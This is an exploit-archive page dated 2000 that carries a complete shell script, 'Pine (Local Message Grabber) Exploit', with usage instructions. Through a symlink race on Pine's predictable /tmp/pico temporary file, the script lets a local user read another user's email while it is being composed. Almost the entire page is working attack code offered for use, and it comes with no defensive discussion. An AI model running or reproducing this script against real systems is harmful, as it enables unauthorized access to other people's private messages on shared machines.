Pine (Local Message Grabber) Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Pine (Local Message Grabber) Exploit
# Published : 2000-12-15
# Author : Mat
# Previous Title : Sendmail 8.11.x Exploit (i386-Linux)
# Next Title : Kwintv Local Buffer Overflow Exploit (gid=video(33))

#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
#  mat@hacksware.com
#  http://hacksware.com
#
# [x]  enable-alternate-editor-cmd
# [x]  enable-alternate-editor-implicitly
# editor                   = /usr/bin/vi
#

PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
echo PICO_FILE is $PICO_FILE

#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
 rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
 rm -f $TRASHCAN
fi

ln -s $TRASHCAN $PICO_FILE
while :
do
 if test -f $TRASHCAN
 then
  break
 fi
done

echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE


# www.Syue.com [2000-12-15]